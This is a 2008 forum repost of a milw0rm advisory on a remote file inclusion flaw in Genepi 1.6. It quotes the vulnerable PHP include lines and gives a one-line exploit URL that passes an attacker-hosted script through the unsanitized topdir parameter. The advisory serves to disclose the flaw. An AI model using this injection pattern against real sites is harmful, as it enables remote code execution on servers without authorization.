Guest Nemessis Posted April 26, 2008 Report Posted April 26, 2008 http://www.milw0rm.com/exploits/2539---------------------------------------------------------------------------Genepi <= 1.6 [topdir] Remote File Include Vulnerability---------------------------------------------------------------------------Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://rstcenter.com:Remote : YesCritical Level : Dangerous---------------------------------------------------------------------------Affected software description :~~~~~~~~~~~~~~~~~~~~~~~~~~Application : Genepiversion : 1.6URL : anonymous@cvs.savannah.nongnu.org:/cvsroot/genepi genepi------------------------------------------------------------------Vulnerable CoDE:~~~~~~~~~~~~~~~~~~~~~~~~~~$libdir = $topdir . 'lib/';//blablabla.....//Including Genepi libs//Base classesinclude ($libdir . 'GenepiObject.php');include ($libdir . 'parser.php');include ($libdir . 'GenepiException.php');include ($libdir . 'Dtd.php');Exploit:~~~~Variable $topdir not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.# http://www.site.com/[path]/genepi.php?topdir=[Evil_Script]---------------------------------------------------------------------------Shoutz:~~# Greetz to [Oo], str0ke, th0r, RST TEAM: [ !_30, darkking, DarkWizzard, Elias, Icarius, MiniDisc, Nemessis, Shocker, SpiridusuCaddy and sysghost !]# To all members of #h4cky0u and RST [ hTTp://rstcenter.com ]---------------------------------------------------------------------------*/ Quote
